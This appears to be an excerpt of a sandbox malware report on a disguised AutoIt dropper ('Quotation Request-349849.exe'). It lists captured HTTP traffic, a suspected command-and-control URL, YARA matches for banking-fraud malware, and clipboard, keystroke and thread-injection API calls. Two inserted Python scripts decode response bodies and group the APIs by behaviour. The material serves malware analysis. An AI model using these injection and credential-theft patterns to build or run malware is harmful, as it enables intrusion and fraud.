                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:07:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WKX7hwH%2Bi7ENN2Ve0ygdeHII8eWoAJUMwCztan0yCoA%2FLuRq%2B3R6Fd6fBi6h7daqxMQyNd2oTgMpdluwO36L129AOpXwT5Sg4%2BffglqRaLlbeeDYD3wmpB7xu8FhLnZt%2Bn8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f15d5faffc58c47-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1998&rtt_var=999&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=598&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 
69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 13 Dec 2024 12:07:57 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 13 Dec 2024 12:08:00 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 13 Dec 2024 12:08:02 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 13 Dec 2024 12:08:05 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 13 Dec 2024 12:08:12 GMT
    Server: Apache
    Content-Length: 493
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 13 Dec 2024 12:08:15 GMT
    Server: Apache
    Content-Length: 493
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 13 Dec 2024 12:08:17 GMT
    Server: Apache
    Content-Length: 493
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 13 Dec 2024 12:08:20 GMT
    Server: Apache
    Content-Length: 493
    Connection: close
    Content-Type: text/html; charset=utf-8
    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
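The first Cloudflare 404 above is delivered chunked and gzip-compressed, so the report's Data Ascii rendering of it is unreadable and only the Data Raw hex carries the body. The Python below is an added example, not part of the Joe Sandbox report: given one of these entries as a single line, it pulls the hex out of the Data Raw field, undoes the chunked transfer coding and inflates the gzip stream, and it tolerates the truncation the report applies to long dumps (a cut-off chunk is kept as far as it goes, and a cut-off gzip stream yields whatever inflates). The sample line it builds with make_report_line is constructed here for demonstration; the hex in the entries above can be fed to decode_body the same way.

```python
"""Decode the body of an HTTP response as Joe Sandbox prints it (added example).

A report entry is the status line and headers run together, then
"Data Raw: <hex bytes>" and a lossy "Data Ascii:" view. This reverses the
chunked transfer coding and gzip content coding named in the headers.
"""
import gzip
import re
import zlib

# Hex run after "Data Raw:"; the trailing \b stops it swallowing the "Da" of "Data Ascii".
HEX_RE = re.compile(r"Data Raw:\s*((?:[0-9a-fA-F]{2}\s+)*[0-9a-fA-F]{2})\b")


def extract_raw_bytes(report_line: str) -> bytes:
    """Return the bytes of the 'Data Raw' hex dump in a report line (empty if absent)."""
    m = HEX_RE.search(report_line)
    return bytes.fromhex(m.group(1)) if m else b""


def dechunk(body: bytes) -> bytes:
    """Undo HTTP/1.1 chunked transfer coding; a cut-off last chunk is kept as far as it goes."""
    out = bytearray()
    pos = 0
    while True:
        nl = body.find(b"\r\n", pos)
        if nl < 0:
            break                                   # no chunk-size line left
        size_field = body[pos:nl].split(b";")[0]    # drop any chunk extension
        try:
            size = int(size_field, 16)
        except ValueError:
            break                                   # malformed size line
        if size == 0:
            break                                   # last-chunk marker
        start = nl + 2
        out += body[start:start + size]             # shorter than size if the dump was truncated
        pos = start + size + 2                      # skip the CRLF that ends the chunk
        if pos > len(body):
            break
    return bytes(out)


def gunzip_partial(data: bytes) -> bytes:
    """Inflate a gzip stream; a truncated stream yields the prefix that could be decoded."""
    inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)   # 16 = expect a gzip header
    try:
        return inflater.decompress(data)
    except zlib.error:
        return b""                                       # corrupt rather than merely short


def decode_body(report_line: str) -> bytes:
    """Everything before 'Data Raw:' is headers; they decide which codings to undo."""
    headers = report_line.split("Data Raw:", 1)[0]
    raw = extract_raw_bytes(report_line)
    if "Transfer-Encoding: chunked" in headers:
        raw = dechunk(raw)
    if "Content-Encoding: gzip" in headers:
        raw = gunzip_partial(raw)
    return raw


def make_report_line(html: bytes, keep_bytes=None) -> str:
    """Constructed sample: a report-style line for a chunked+gzip body, optionally truncated."""
    compressed = gzip.compress(html)
    wire = f"{len(compressed):x}\r\n".encode() + compressed + b"\r\n0\r\n\r\n"
    if keep_bytes is not None:
        wire = wire[:keep_bytes]                    # mimic the report cutting a long dump short
    hexdump = " ".join(f"{b:02x}" for b in wire)
    return ("Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found"
            "Content-Type: text/htmlTransfer-Encoding: chunkedConnection: close"
            f"Content-Encoding: gzipData Raw: {hexdump} Data Ascii: (omitted)")


if __name__ == "__main__":
    page = b"<!doctype html><html><head><title>404 Not Found</title></head></html>"
    print(decode_body(make_report_line(page)))
    print(decode_body(make_report_line(page, keep_bytes=40)))
```

For the real entries, join the reformatted header lines back into one string before calling decode_body; for the gzip entry the chunk-size line reads 0x1ed (493 bytes) but far fewer bytes are dumped, so expect a prefix of the page at best.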
Source: LcmEonpIrfS.exe, 00000007.00000002.2561468809.0000000004A6A000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.sunnyz.store
Source: LcmEonpIrfS.exe, 00000007.00000002.2561468809.0000000004A6A000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.sunnyz.store/ead0/
Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: comp.exe, 00000006.00000002.2561548663.00000000039BA000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.0000000002E6A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: comp.exe, 00000006.00000002.2561548663.00000000039BA000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.0000000002E6A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: comp.exe, 00000006.00000002.2558167888.0000000000658000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: comp.exe, 00000006.00000002.2558167888.0000000000669000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: comp.exe, 00000006.00000002.2558167888.0000000000658000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: comp.exe, 00000006.00000002.2558167888.0000000000658000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: comp.exe, 00000006.00000002.2558167888.0000000000658000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: comp.exe, 00000006.00000002.2558167888.0000000000669000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: comp.exe, 00000006.00000003.1916692588.000000000764A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: comp.exe, 00000006.00000002.2561548663.0000000003696000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.0000000002B46000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_00844164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00844164
Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_00843F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00843F66
Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_0083001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0083001C
Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_0085CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0085CABC
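The clipboard and keyboard functions listed above, and the Nt* stubs the report attributes to svchost.exe under System Summary, are easier to act on when grouped by behaviour than read one entry at a time. The Python below is an added example, not Joe Sandbox code: it parses entries of the form "Source: <image>Code function: <id> <api>,<api>,...,<id>" and maps the APIs onto a small behaviour table of its own. That table and its category names are this example's assumptions, not the report's signature logic; the sample entries are copied from this report. One deliberate choice is shown by 0_2_0085CABC: GetKeyState alone is not treated as keystroke polling, because it returns key state as of the current window message and is routine in dialog procedures, whereas GetAsyncKeyState and GetKeyboardState read live key state.

```python
"""Triage Joe Sandbox 'Code function' entries by the Windows APIs they call (added example).

Each entry gives a function id (its hex tail is the function's start address),
the API names that function calls, and the id again. Grouping the APIs by
behaviour turns a long list into a short per-image worklist of addresses to
open first in a disassembler.
"""
import re
from collections import defaultdict

# Accepts the run-together "...exeCode function:" form the report uses, an
# optional " | " separator, and an optional repeat of the function id at the end.
ENTRY_RE = re.compile(
    r"Source:\s*(?P<image>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<func>\d+_\d+_[0-9A-Fa-f]+)\s+(?P<apis>.*?)(?:,?\s*(?P=func))?\s*$"
)

# Heuristic grouping chosen for this example, not Joe Sandbox's signature logic.
# GetKeyState is intentionally absent from "keystroke polling" (see lead-in).
BEHAVIOURS = {
    "clipboard access": {"OpenClipboard", "GetClipboardData", "SetClipboardData"},
    "keystroke polling": {"GetAsyncKeyState", "GetKeyboardState"},
    "foreign memory write": {"NtAllocateVirtualMemory", "NtProtectVirtualMemory", "NtWriteVirtualMemory"},
    "thread hijack / APC injection": {"NtSetContextThread", "NtSuspendThread", "NtResumeThread", "NtQueueApcThread"},
    "section mapping": {"NtCreateSection", "NtMapViewOfSection"},
    "process creation": {"NtCreateProcessEx"},
}


def parse_entry(line):
    """Return (image, function id, [api, ...]) or None for lines of another shape."""
    m = ENTRY_RE.search(line.strip())
    if not m:
        return None
    apis = [a.strip() for a in m.group("apis").split(",") if a.strip()]
    return m.group("image"), m.group("func"), apis


def triage(lines):
    """Map image -> behaviour -> sorted function ids; duplicate entries collapse into one."""
    hits = defaultdict(lambda: defaultdict(set))
    for line in lines:
        parsed = parse_entry(line)
        if parsed is None:
            continue
        image, func, apis = parsed
        called = set(apis)
        for behaviour, markers in BEHAVIOURS.items():
            if markers & called:
                hits[image][behaviour].add(func)
    return {img: {b: sorted(f) for b, f in behs.items()} for img, behs in hits.items()}


def native_apis(lines):
    """Nt* calls per image, the ones the report flags as direct/indirect syscalls."""
    seen = defaultdict(set)
    for line in lines:
        parsed = parse_entry(line)
        if parsed is not None:
            image, _, apis = parsed
            seen[image].update(a for a in apis if a.startswith("Nt"))
    return {img: sorted(s) for img, s in seen.items()}


# Sample input: entries copied from this report (the dropper's clipboard and
# keyboard functions, and Nt* stubs listed for svchost.exe). The first entry is
# repeated on purpose, as the report repeats it; triage() collapses it.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00844164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00844164",
    r"Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00844164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00844164",
    r"Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00843F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00843F66",
    r"Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0083001C",
    r"Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0085CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0085CABC",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042C643 NtClose,3_2_0042C643",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72B60 NtClose,LdrInitializeThunk,3_2_03B72B60",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B74340 NtSetContextThread,3_2_03B74340",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B74650 NtSuspendThread,3_2_03B74650",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72BF0 NtAllocateVirtualMemory,3_2_03B72BF0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72FB0 NtResumeThread,3_2_03B72FB0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72F90 NtProtectVirtualMemory,3_2_03B72F90",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72F30 NtCreateSection,3_2_03B72F30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72F60 NtCreateProcessEx,3_2_03B72F60",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72EE0 NtQueueApcThread,3_2_03B72EE0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72E30 NtWriteVirtualMemory,3_2_03B72E30",
]

if __name__ == "__main__":
    for image, behaviours in triage(SAMPLE_LINES).items():
        print(image)
        for behaviour, funcs in behaviours.items():
            print(f"  {behaviour}: {', '.join(funcs)}")
```

On this sample the svchost.exe image collects the write-then-hijack set (NtAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, NtSetContextThread, NtQueueApcThread, NtResumeThread) that the report's injection signatures describe, while the initial executable collects only clipboard and keystroke categories; the stubs in the 0x03B7xxxx range of svchost.exe lie outside that image's own module, which is consistent with the report's direct-syscall finding but is not something this script checks on its own.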

                E-Banking Fraud

                barindex
Source: Yara match | File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.2561468809.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2557800051.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2560519490.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2561398327.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1736836751.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1736362212.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1737238924.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2559379970.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_007D3B3A This is a third-party compiled AutoIt script.
Source: Quotation Request-349849.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Quotation Request-349849.exe, 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_704ae87a-c
Source: Quotation Request-349849.exe, 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_c22c3d9e-9
Source: Quotation Request-349849.exe | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_95312260-b
Source: Quotation Request-349849.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_481cf4e5-e
Source: initial sample | Static PE information: Filename: Quotation Request-349849.exe
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0042C643 NtClose,3_2_0042C643
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72B60 NtClose,LdrInitializeThunk,3_2_03B72B60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03B72DF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03B72C70
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B735C0 NtCreateMutant,LdrInitializeThunk,3_2_03B735C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B74340 NtSetContextThread,3_2_03B74340
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B74650 NtSuspendThread,3_2_03B74650
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72BA0 NtEnumerateValueKey,3_2_03B72BA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72B80 NtQueryInformationFile,3_2_03B72B80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72BF0 NtAllocateVirtualMemory,3_2_03B72BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72BE0 NtQueryValueKey,3_2_03B72BE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72AB0 NtWaitForSingleObject,3_2_03B72AB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72AF0 NtWriteFile,3_2_03B72AF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72AD0 NtReadFile,3_2_03B72AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72FB0 NtResumeThread,3_2_03B72FB0
